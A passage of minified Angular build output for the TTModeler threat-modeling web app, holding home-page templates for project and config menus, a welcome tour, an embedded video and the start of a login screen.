"),u(),s(10,"\n                "),m(11,"mat-menu",null,19),s(13,"\n                  "),m(14,"button",20),he("click",function(){return be(e),Me(B().dataService.OnSave())}),s(15,"\n                    "),m(16,"mat-icon"),s(17,"save"),u(),s(18,"\n                    "),m(19,"span"),s(20),oe(21,"translate"),u(),s(22,"\n                  "),u(),s(23,"\n                  "),m(24,"button",21),he("click",function(){return be(e),Me(B().dataService.OnSave(!1,!0))}),oe(25,"translate"),s(26,"\n                    "),m(27,"mat-icon"),s(28,"file_download"),u(),s(29,"\n                    "),m(30,"span"),s(31),oe(32,"translate"),u(),s(33,"\n                  "),u(),s(34,"\n                  "),m(35,"button",22),he("click",function(){return be(e),Me(B().dataService.OnSave(!1,!0,!0))}),oe(36,"translate"),s(37,"\n                    "),m(38,"mat-icon"),s(39,"file_download"),u(),s(40,"\n                    "),m(41,"span"),s(42),oe(43,"translate"),u(),s(44,"\n                  "),u(),s(45,"\n                  "),m(46,"button",21),he("click",function(){return be(e),Me(B().dataService.OnSave(!0,!1,!0))}),oe(47,"translate"),s(48,"\n                    "),m(49,"mat-icon"),s(50,"output"),u(),s(51,"\n                    "),m(52,"span"),s(53),oe(54,"translate"),u(),s(55,"\n                  "),u(),s(56,"\n                  "),m(57,"button",23),oe(58,"translate"),s(59,"\n                    "),m(60,"mat-icon"),s(61,"wifi_protected_setup"),u(),s(62,"\n                    "),m(63,"span"),s(64),oe(65,"translate"),u(),s(66,"\n                  "),u(),s(67,"\n                  "),m(68,"mat-menu",null,24),s(70,"\n                    "),m(71,"button",25),s(72,"\n                      "),m(73,"mat-icon"),s(74,"file_upload"),u(),s(75),oe(76,"translate"),u(),s(77,"\n                    "),m(78,"button",26),he("click",function(){return be(e),Me(B().dataService.ExchangeConfigWithDefault())}),s(79),oe(80,"translate"),u(),s(81,"\n                    "),ne(82,cct,2,1,"button",27),s(83,"\n                  "),u(),s(84,"\n                  "),m(85,"button",21),he("click",function(){return be(e),Me(B().dataService.OnTransferProjectDetails())}),oe(86,"translate"),s(87,"\n                    "),m(88,"mat-icon"),s(89,"exit_to_app"),u(),s(90,"\n                    "),m(91,"span"),s(92),oe(93,"translate"),u(),s(94,"\n                  "),u(),s(95,"\n                  "),m(96,"button",20),he("click",function(){return be(e),Me(B().dataService.OnCloseFile())}),s(97,"\n                    "),m(98,"mat-icon"),s(99,"close"),u(),s(100,"\n                    "),m(101,"span"),s(102),oe(103,"translate"),u(),s(104,"\n                  "),u(),s(105,"\n                  "),it(106,"mat-divider"),s(107,"\n                  "),m(108,"input",28,29),he("change",function(n){return be(e),Me(B().dataService.ImportFile(n))}),u(),s(110,"\n                  "),m(111,"button",30),he("click",function(){return be(e),Me(Ti(109).click())}),oe(112,"translate"),s(113,"\n                    "),m(114,"mat-icon"),s(115,"file_upload"),u(),s(116,"\n                    "),m(117,"span"),s(118),oe(119,"translate"),u(),s(120,"\n                  "),u(),s(121,"\n                "),u(),s(122,"\n              "),u(),s(123,"\n\n              "),ne(124,lct,5,4,"div",31),s(125,"\n\n              "),ne(126,dct,6,3,"button",32),s(127,"\n              "),ne(128,mct,6,4,"button",33),s(129,"\n              "),m(130,"mat-menu",null,34),s(132,"\n                "),m(133,"button",26),he("click",function(){return be(e),Me(B().dataService.OnNewProject())}),s(134,"\n                  "),m(135,"mat-icon"),s(136,"book_2"),u(),s(137,"\n                  "),m(138,"span"),s(139),oe(140,"translate"),u(),s(141,"\n                "),u(),s(142,"\n                "),ne(143,uct,8,2,"button",27),s(144,"\n              "),u(),s(145,"\n              "),it(146,"br"),s(147,"\n              "),ne(148,fct,48,17,"ng-container",35),s(149,"\n              "),ne(150,pct,2,3,"mat-paginator",36),s(151,"\n              \n              "),ne(152,_ct,46,16,"ng-container",35),s(153,"\n              "),ne(154,gct,2,3,"mat-paginator",36),s(155,"\n\n              "),m(156,"h2"),s(157),oe(158,"translate"),m(159,"button",18),s(160,"\n                  "),m(161,"mat-icon"),s(162,"more_vert"),u(),s(163,"\n                "),u(),s(164,"\n                "),m(165,"mat-menu",null,37),s(167,"\n                  "),m(168,"input",38,39),he("change",function(n){return be(e),Me(B().dataService.ImportFile(n))}),u(),s(170,"\n                  "),m(171,"button",26),he("click",function(){return be(e),Me(Ti(169).click())}),s(172,"\n                    "),m(173,"mat-icon"),s(174,"file_upload"),u(),s(175,"\n                    "),m(176,"span"),s(177),oe(178,"translate"),u(),s(179,"\n                  "),u(),s(180,"\n                "),u(),s(181,"\n              "),u(),s(182,"\n\n              "),ne(183,yct,48,16,"ng-container",35),s(184,"\n              "),ne(185,bct,2,3,"mat-paginator",36),s(186,"\n\n              "),ne(187,Mct,46,16,"ng-container",35),s(188,"\n              "),ne(189,vct,2,3,"mat-paginator",36),s(190,"\n\n              "),m(191,"div",40),s(192,"\n                "),m(193,"mat-icon",41),s(194,"waving_hand"),u(),s(195,"\n                "),m(196,"button",42),he("click",function(){return be(e),Me(B().tourService.start())}),s(197),oe(198,"translate"),u(),s(199,"\n                "),ne(200,Act,11,3,"ng-container",11),s(201,"\n                "),it(202,"br"),s(203,"\n                "),m(204,"mat-icon",43),s(205,"code"),u(),s(206,"\n                "),m(207,"a",44),s(208),oe(209,"translate"),u(),s(210,"\n              "),u(),s(211,"\n            "),Mt()}if(2&t){const e=Ti(12),i=Ti(69),n=Ti(166),r=B();C(3),ct("\n                ",re(4,47,"pages.home.projects"),"\n                "),C(2),V("matMenuTriggerFor",e),C(9),V("disabled",!r.dataService.CanSaveProject),C(6),ke(re(21,49,"pages.home.menu.saveProject")),C(4),at("matTooltip",re(25,51,"pages.home.menu.downloadProject.tt")),V("disabled",!r.dataService.Project),C(7),ke(re(32,53,"pages.home.menu.downloadProject")),C(4),at("matTooltip",re(36,55,"pages.home.menu.downloadConfig.tt")),V("disabled",!r.dataService.Project),C(7),ke(re(43,57,"pages.home.menu.downloadConfig")),C(4),at("matTooltip",re(47,59,"pages.home.menu.exportConfig.tt")),V("disabled",!r.dataService.Project||!r.dataService.IsLoggedIn),C(7),ke(re(54,61,"pages.home.menu.exportConfig")),C(4),at("matTooltip",re(58,63,"pages.home.menu.exchangeConfig.tt")),V("disabled",!r.dataService.Project)("matMenuTriggerFor",i),C(7),ke(re(65,65,"pages.home.menu.exchangeConfig")),C(7),V("disabled",!0),C(4),ct("\n                      ",re(76,67,"pages.home.menu.importConfig"),"\n                    "),C(4),ke(re(80,69,"general.DefaultConfiguration")),C(3),V("ngForOf",r.dataService.AvailableGHConfigs),C(3),at("matTooltip",re(86,71,"pages.home.menu.transferProjectDetails.tt")),V("disabled",!r.dataService.HasProject),C(7),ke(re(93,73,"pages.home.menu.transferProjectDetails")),C(4),V("disabled",!r.dataService.Project),C(6),ke(re(103,75,"pages.home.menu.closeProject")),C(9),at("matTooltip",re(112,77,"pages.home.menu.importProject.tt")),C(7),ke(re(119,79,"pages.home.menu.importProject")),C(6),V("ngIf",r.dataService.HasProject),C(2),V("ngIf",0==r.dataService.AvailableConfigs.length),C(2),V("ngIf",r.dataService.AvailableConfigs.length>0),C(11),ke(re(140,81,"general.DefaultConfiguration")),C(4),V("ngForOf",r.dataService.AvailableConfigs),C(5),V("ngForOf",r.GetAvailableGHProjects()),C(2),V("ngIf",r.dataService.AvailableGHProjects.length>0),C(2),V("ngForOf",r.GetAvailableFSProjects()),C(2),V("ngIf",r.dataService.AvailableFSProjects.length>0),C(3),ct("\n                ",re(158,83,"pages.home.configs"),"\n                "),C(2),V("matMenuTriggerFor",n),C(18),ke(re(178,85,"pages.home.menu.importConfig")),C(6),V("ngForOf",r.GetAvailableGHConfigs()),C(2),V("ngIf",r.dataService.AvailableGHConfigs.length>0),C(2),V("ngForOf",r.GetAvailableFSConfigs()),C(2),V("ngIf",r.dataService.AvailableFSConfigs.length>0),C(8),ke(re(198,87,"pages.home.welcomeTour")),C(3),V("ngIf",!(null!=r.electron&&r.electron.isElectron)),C(8),ke(re(209,89,"pages.home.viewSourceCode"))}}function Ect(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),m(2,"h2"),s(3),oe(4,"translate"),u(),s(5,"\n              "),m(6,"p"),s(7),oe(8,"translate"),u(),s(9,"\n              "),m(10,"button",64),s(11),oe(12,"translate"),u(),s(13,"\n              "),m(14,"button",65),he("click",function(){be(e);const n=B();return n.dataService.GuestLogin(),Me(n.CheckTourStart())}),s(15),oe(16,"translate"),u(),s(17,"\n            "),Mt()}2&t&&(C(3),ct("",re(4,4,"pages.home.welcome"),"!"),C(4),ct("",re(8,6,"pages.home.need_login"),":"),C(4),ke(re(12,8,"pages.home.go_to_login")),C(4),ke(re(16,10,"pages.login.loginAsGuest")))}function Dct(t,a){1&t&&(bt(0),s(1,"\n              "),m(2,"div",45),s(3),oe(4,"translate"),m(5,"a",66),s(6,"YouTube"),u(),s(7,"\n                "),it(8,"br"),s(9,"\n              "),u(),s(10,"\n            "),Mt()),2&t&&(C(3),ct("\n                ",re(4,1,"pages.home.video"),": "))}function xct(t,a){if(1&t&&(bt(0),s(1,"\n              "),m(2,"div",67),s(3,"\n                "),it(4,"iframe",68),s(5,"\n              "),u(),s(6,"\n            "),Mt()),2&t){const e=B();C(4),V("src",e.VideoURL,PC)}}function wct(t,a){if(1&t&&(m(0,"p",69)(1,"mat-icon",70),s(2,"done"),u(),s(3),oe(4,"translate"),u()),2&t){const e=a.$implicit;C(3),ct(" ",re(4,1,"pages.home.tool."+e),"")}}function Ict(t,a){if(1&t&&(m(0,"p"),s(1),u()),2&t){const e=a.$implicit;C(1),za("",e.number,". ",e.name,"")}}function Rct(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.next")))}function Sct(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).ProgressTracker())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.progressTracker")))}function kct(t,a){if(1&t){const e=Ye();m(0,"button",16),he("click",function(){return be(e),Me(B(2).NextProcessStep())}),s(1),oe(2,"translate"),u()}2&t&&(C(1),ke(re(2,1,"tour.end")))}function Pct(t,a){if(1&t){const e=Ye();m(0,"mat-expansion-panel",14),he("opened",function(){const r=be(e).index;return Me(B().SetProcessStep(r+2))}),s(1,"\n                "),m(2,"mat-expansion-panel-header"),s(3,"\n                  "),m(4,"mat-panel-title"),s(5),u(),s(6,"\n                  "),m(7,"mat-panel-description"),s(8),m(9,"mat-icon"),s(10),u(),s(11,"\n                  "),u(),s(12,"\n                "),u(),s(13,"\n\n                "),ne(14,Ict,2,2,"p",35),s(15,"\n                "),m(16,"mat-action-row"),s(17,"\n                  "),m(18,"button",16),he("click",function(){return be(e),Me(B().PrevProcessStep())}),s(19),oe(20,"translate"),u(),s(21,"\n                  "),ne(22,Rct,3,3,"button",71),s(23,"\n                  "),ne(24,Sct,3,3,"button",71),s(25,"\n                  "),ne(26,kct,3,3,"button",71),s(27,"\n                "),u(),s(28,"\n              "),u()}if(2&t){const e=a.$implicit,i=a.index,n=a.last,r=B();ri("margin-bottom",n?"20px":"0px"),V("expanded",r.processStep===i+2),C(5),ct("\n                    ",e.name,"\n                  "),C(3),ct("\n                    ",e.desc,"\n                    "),C(2),ke(e.icon),C(4),V("ngForOf",e.steps),C(5),ke(re(20,11,"tour.prev")),C(3),V("ngIf",!n),C(2),V("ngIf",n),C(2),V("ngIf",n)}}const Oct=[{path:"home",component:(()=>{class t{constructor(e,i,n,r,c,d,T,k,q,Y,te,pe){this.router=e,this.route=i,this.theme=n,this.dataService=r,this.dialogService=c,this.dialog=d,this.locStorage=T,this.tourService=k,this.translate=q,this.electron=Y,this.ttmService=te,this.sanitizer=pe,this.processStep=null,this.VideoURL=null,this.pageProjectSize=5,this.pageConfigSize=5,this.pageGHProjectIndex=0,this.pageGHConfigIndex=0,this.pageFSProjectIndex=0,this.pageFSConfigIndex=0,this.toolBenefits=["platform","onlineStorage","offlineStorage","libraries","libraryIntegration","guidelines","diagramming","riskAssessment","dashboard","reports","export","languages","collaboration"],this.VideoURL=this.sanitizer.bypassSecurityTrustResourceUrl("https://www.youtube-nocookie.com/embed/videoseries?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u")}get Stages(){return this.ttmService.Stages}get HasCookieConsent(){let e=this.locStorage.Get(si.COOKIE_CONSENT);return null!=e&&JSON.parse(e)}ngOnInit(){const e=n=>({anchorId:n,content:this.translate.instant("tour."+n+".content"),title:this.translate.instant("tour."+n+".title"),route:"",enableBackdrop:!0,prevBtnTitle:this.translate.instant("tour.prev"),nextBtnTitle:this.translate.instant("tour.next"),endBtnTitle:this.translate.instant("tour.end")});this.translate.get("tour.change-settings.title").subscribe(()=>{const n=()=>{this.tourService.initialize([e("change-settings"),e("message-history"),e("save-file"),e("set-progress")]),null==this.locStorage.Get(si.COOKIE_CONSENT)?this.dialogService.OpenCookieConsentDialog().subscribe(d=>this.CheckTourStart()):this.CheckTourStart()},r=this.locStorage.Get(si.LANGUAGE);r&&0!=r.length?n():this.dialog.open(sct).afterClosed().subscribe(c=>{n()})});let i="modeling";this.route.queryParams.subscribe(n=>{null!=n.origin&&(i=n.origin)}),this.dataService.ProjectChanged.subscribe(n=>{null!=n&&this.router.navigate(["/"+i])})}CheckTourStart(){[Wr.LoggedIn,Wr.Guest].includes(this.dataService.UserMode)&&(this.locStorage.Get(si.WELCOME_TOUR_STARTED)||(this.tourService.start(),this.locStorage.Set(si.WELCOME_TOUR_STARTED,JSON.stringify(!0))))}GetRepoName(e){var i;return null===(i=this.dataService.GetRepoOfFile(e))||void 0===i?void 0:i.name}IsProtected(e){var i;return!(null!==(i=this.dataService.GetRepoOfFile(e))&&void 0!==i&&i.isWritable)}GetAvailableGHProjects(){return this.dataService.AvailableGHProjects.slice(this.pageGHProjectIndex*this.pageProjectSize,(this.pageGHProjectIndex+1)*this.pageProjectSize)}GetAvailableGHConfigs(){return this.dataService.AvailableGHConfigs.slice(this.pageGHConfigIndex*this.pageConfigSize,(this.pageGHConfigIndex+1)*this.pageConfigSize)}GetAvailableFSProjects(){return this.dataService.AvailableFSProjects.slice(this.pageFSProjectIndex*this.pageProjectSize,(this.pageFSProjectIndex+1)*this.pageProjectSize)}GetAvailableFSConfigs(){return this.dataService.AvailableFSConfigs.slice(this.pageFSConfigIndex*this.pageConfigSize,(this.pageFSConfigIndex+1)*this.pageConfigSize)}SetProcessStep(e){this.processStep=e}NextProcessStep(){this.processStep++}PrevProcessStep(){this.processStep--}ProgressTracker(){this.NextProcessStep(),this.dialogService.OpenProgresstrackerDialog()}GetFileIcon(e){return e.source==hn.FileSystem?"file_present":"cloud_queue"}CutName(e){return e&&e.length>35?"[...]"+e.substring(e.length-30):e}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oo),Ee(Tl),Ee(Oa),Ee(Yi),Ee(Wn),Ee(vu),Ee(_r),Ee(Gb),Ee(Sn),Ee(ST),Ee(x5),Ee(cy))},t.\u0275cmp=Wt({type:t,selectors:[["app-home"]],decls:127,vars:41,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/home",2,"width","100%","height","100%"],[1,"title"],["src","./assets/icons/favicon.192x192.png?raw=true","alt","logo",2,"width","50px"],["color","warn",1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","10px"],["href","https://emgarde.de","target","_blank"],[1,"row"],[1,"column"],[1,"first-column-content"],[4,"ngIf"],[1,"second-column-content"],[1,"expansion-panel-headers-align"],["hideToggle","",3,"expanded","opened"],["style","margin: 0;",4,"ngFor","ngForOf"],["mat-button","","color","primary",3,"click"],["hideToggle","",3,"marginBottom","expanded","opened",4,"ngFor","ngForOf"],["mat-icon-button","","aria-label","Menu",2,"vertical-align","middle",3,"matMenuTriggerFor"],["projMenu","matMenu"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","","matTooltipShowDelay","1000",3,"disabled","matTooltip","click"],["mat-menu-item","","matTooltipShowDelay","1000",1,"exportBtn",3,"disabled","matTooltip","click"],["mat-menu-item","","matTooltipShowDelay","1000",1,"exportBtn",3,"disabled","matMenuTriggerFor","matTooltip"],["exchangeMenu","matMenu"],["mat-menu-item","",3,"disabled"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"click",4,"ngFor","ngForOf"],["hidden","","type","file","accept",".ttmp",3,"change"],["projectUploader",""],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"],["style","margin-bottom: 10px;",4,"ngIf"],["mat-button","","style","padding-left: 0px; margin-bottom: 20px;",3,"click",4,"ngIf"],["mat-button","","style","padding-left: 0px; margin-bottom: 20px;",3,"matMenuTriggerFor",4,"ngIf"],["createProjectWithConfig","matMenu"],[4,"ngFor","ngForOf"],["class","paginator",3,"length","pageSize","hidePageSize","page",4,"ngIf"],["confMenu","matMenu"],["hidden","","type","file","accept",".ttmc",3,"change"],["configUploader",""],[2,"margin-top","50px"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px"],[1,"color-primary","astext",3,"click"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","10px"],["href","https://github.com/SecSimon/TTM","target","_blank"],[2,"margin-bottom","10px"],["mat-button","",2,"padding-left","0px","margin-bottom","20px",3,"click"],["color","primary"],["mat-button","",2,"padding-left","0px","margin-bottom","20px",3,"matMenuTriggerFor"],["id","project"],["matTooltipShowDelay","1000",1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px",3,"matTooltip"],["matTooltipShowDelay","1000",2,"font-size","small","margin-left","5px",3,"matTooltip"],["class","iconBtn","style","vertical-align: top; margin-right: 5px;","matTooltipShowDelay","1000",3,"matTooltip",4,"ngIf"],["mat-icon-button","","matTooltipShowDelay","1000",1,"show-on-hover","iconBtn",2,"margin-right","5px",3,"matMenuTriggerFor","matTooltip"],["moreGHProject","matMenu"],["matTooltipShowDelay","1000",1,"iconBtn",2,"vertical-align","top","margin-right","5px",3,"matTooltip"],[1,"paginator",3,"length","pageSize","hidePageSize","page"],["moreFSProject","matMenu"],["id","config"],[2,"font-size","small","margin-left","5px"],["moreGHConfig","matMenu"],["moreFSConfig","matMenu"],[1,"iconBtn",2,"vertical-align","top","font-size","20px","margin-right","5px","margin-bottom","5px"],["href","https://github.com/SecSimon/TTM/releases","target","_blank"],["mat-button","","routerLink","/login"],["mat-button","",3,"click"],["href","https://youtube.com/playlist?list=PLSMRtuVN409fB35RLljjg3jNkVJbLIP1u","target","_blank"],[1,"videoContainer"],["title","Thing Threat Modeling","frameborder","0","allow","accelerometer; encrypted-media; gyroscope; picture-in-picture","allowfullscreen","",1,"video",3,"src"],[2,"margin","0"],[2,"vertical-align","bottom"],["mat-button","","color","primary",3,"click",4,"ngIf"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),it(6,"app-side-nav",3),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"div",4),s(12,"\n        "),m(13,"h1"),it(14,"img",5),s(15),oe(16,"translate"),u(),s(17,"\n        "),m(18,"h3"),s(19),oe(20,"translate"),u(),s(21,"\n        "),m(22,"p"),s(23,"\n          "),m(24,"mat-icon",6),s(25,"announcement"),u(),s(26),oe(27,"translate"),m(28,"a",7),s(29,"TTModeler Pro"),u(),s(30,"\n        "),u(),s(31,"\n      "),u(),s(32,"\n      "),m(33,"div",8),s(34,"\n        "),m(35,"div",9),s(36,"\n          "),m(37,"div",10),s(38,"\n            "),ne(39,Tct,212,91,"ng-container",11),s(40,"\n\n            "),ne(41,Ect,18,12,"ng-container",11),s(42,"\n          "),u(),s(43,"\n        "),u(),s(44,"\n        "),m(45,"div",9),s(46,"\n          "),m(47,"div",12),s(48,"\n            "),m(49,"h2"),s(50),oe(51,"translate"),u(),s(52,"\n            "),ne(53,Dct,11,3,"ng-container",11),s(54,"\n            "),ne(55,xct,7,1,"ng-container",11),s(56,"\n            "),m(57,"mat-accordion",13),s(58,"\n              "),m(59,"mat-expansion-panel",14),he("opened",function(){return i.SetProcessStep(0)}),s(60,"\n                "),m(61,"mat-expansion-panel-header"),s(62,"\n                  "),m(63,"mat-panel-title"),s(64,"\n                    TTModeler\n                  "),u(),s(65,"\n                  "),m(66,"mat-panel-description"),s(67),oe(68,"translate"),m(69,"mat-icon"),s(70,"terminal"),u(),s(71,"\n                  "),u(),s(72,"\n                "),u(),s(73,"\n\n                "),ne(74,wct,5,3,"p",15),s(75,"\n                "),m(76,"mat-action-row"),s(77,"\n                  "),m(78,"button",16),he("click",function(){return i.NextProcessStep()}),s(79),oe(80,"translate"),u(),s(81,"\n                "),u(),s(82,"\n              "),u(),s(83,"\n              "),m(84,"mat-expansion-panel",14),he("opened",function(){return i.SetProcessStep(1)}),s(85,"\n                "),m(86,"mat-expansion-panel-header"),s(87,"\n                  "),m(88,"mat-panel-title"),s(89),oe(90,"translate"),u(),s(91,"\n                  "),m(92,"mat-panel-description"),s(93),oe(94,"translate"),m(95,"mat-icon"),s(96,"star"),u(),s(97,"\n                  "),u(),s(98,"\n                "),u(),s(99,"\n\n                "),m(100,"p"),s(101),oe(102,"translate"),u(),s(103,"\n                "),m(104,"mat-action-row"),s(105,"\n                  "),m(106,"button",16),he("click",function(){return i.PrevProcessStep()}),s(107),oe(108,"translate"),u(),s(109,"\n                  "),m(110,"button",16),he("click",function(){return i.NextProcessStep()}),s(111),oe(112,"translate"),u(),s(113,"\n                "),u(),s(114,"\n              "),u(),s(115,"\n              "),ne(116,Pct,29,13,"mat-expansion-panel",17),s(117,"\n            "),u(),s(118,"\n          "),u(),s(119,"\n        "),u(),s(120,"\n      "),u(),s(121,"\n    "),u(),s(122,"\n  "),u(),s(123,"\n  "),it(124,"app-status-bar"),s(125,"\n"),u(),s(126,"\n")),2&e&&(C(15),ct(" ",re(16,19,"pages.home.title"),""),C(4),ke(re(20,21,"pages.home.subtitle")),C(7),ct("\n          ",re(27,23,"pages.home.TTModelerPro")," "),C(13),V("ngIf",i.dataService.IsLoggedIn||i.dataService.IsGuest),C(2),V("ngIf",!i.dataService.IsLoggedIn&&!i.dataService.IsGuest),C(9),ke(re(51,25,"pages.home.process")),C(3),V("ngIf",!i.HasCookieConsent),C(2),V("ngIf",i.HasCookieConsent),C(4),V("expanded",0===i.processStep),C(8),ct("\n                    ",re(68,27,"pages.home.tool"),"\n                    "),C(7),V("ngForOf",i.toolBenefits),C(5),ke(re(80,29,"tour.next")),C(5),V("expanded",1===i.processStep),C(5),ct("\n                    ",re(90,31,"pages.home.process"),"\n                  "),C(4),ct("\n                    ",re(94,33,"pages.home.methodology"),"\n                    "),C(8),ke(re(102,35,"pages.home.methodologyInfo")),C(6),ke(re(108,37,"tour.prev")),C(4),ke(re(112,39,"tour.next")),C(5),V("ngForOf",i.Stages))},dependencies:[Zi,Ri,oa,_u,gu,Nd,da,pp,Xo,qo,po,Pa,il,Ec,E8,Dc,tl,wl,x8,pf,_f,x1,Xi],styles:['.primary-color[_ngcontent-%COMP%], a[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.title[_ngcontent-%COMP%]{margin-top:5%;margin-left:12.5%}.column[_ngcontent-%COMP%]{float:left;width:50%}.first-column-content[_ngcontent-%COMP%]{padding-top:30px;margin-left:25%}.second-column-content[_ngcontent-%COMP%]{padding-top:30px;margin-right:25%}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.astext[_ngcontent-%COMP%]{background:none;border:none;margin:0 0 5px;padding:0;cursor:pointer;font-size:large}.iconBtn[_ngcontent-%COMP%]{width:20px;height:20px;line-height:20px}.exportBtn[_ngcontent-%COMP%]     .mat-badge-content{right:-1px!important}.importBtn[_ngcontent-%COMP%]     .mat-badge-content{right:-1px!important}#project[_ngcontent-%COMP%]   .show-on-hover[_ngcontent-%COMP%]{visibility:hidden}#project[_ngcontent-%COMP%]:hover   .show-on-hover[_ngcontent-%COMP%]{visibility:visible}.paginator[_ngcontent-%COMP%]{background:transparent}.paginator[_ngcontent-%COMP%]     .mat-paginator-container{justify-content:left;min-height:auto;padding:0}.paginator[_ngcontent-%COMP%]     .mat-paginator-range-label{margin:0 24px 0 0}#config[_ngcontent-%COMP%]   .show-on-hover[_ngcontent-%COMP%]{visibility:hidden}#config[_ngcontent-%COMP%]:hover   .show-on-hover[_ngcontent-%COMP%]{visibility:visible}.videoContainer[_ngcontent-%COMP%]{position:relative;width:100%;max-width:600px;padding-top:56.25%;margin-bottom:20px}.video[_ngcontent-%COMP%]{position:absolute;inset:0;width:100%;height:100%}.expansion-panel-headers-align[_ngcontent-%COMP%]   mat-expansion-panel[_ngcontent-%COMP%]{max-width:600px}']}),t})()}];let vZ=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(Oct),Ms]}),t})();const Nct=[{path:"",redirectTo:"home",pathMatch:"full"},{path:"**",component:rct}];let Lct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[Ms.forRoot(Nct,{relativeLinkResolution:"legacy"}),vZ,Ms]}),t})();class zct{constructor(a,e="/assets/i18n/",i=".json"){this.http=a,this.prefix=e,this.suffix=i}getTranslation(a){return this.http.get(`${this.prefix}${a}${this.suffix}`)}}let Wct=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,ff,vZ]}),t})();function Fct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step1.title"))}function Vct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step2.title"))}function Bct(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ke(re(1,1,"pages.login.step3.title"))}function Hct(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n            "),m(2,"h1",15),he("click",function(){return be(e),Me(B().onGithubLogin())}),s(3),oe(4,"translate"),m(5,"mat-icon"),s(6,"open_in_new"),u()(),s(7,"\n            "),m(8,"mat-checkbox",16),he("ngModelChange",function(n){return be(e),Me(B().dataService.KeepUserSignedIn=n)}),s(9),oe(10,"translate"),u(),s(11,"\n            "),m(12,"h3",17),he("click",function(){return be(e),Me(B().dataService.GuestLogin())}),s(13),oe(14,"translate"),u(),s(15,"\n          "),Mt()}if(2&t){const 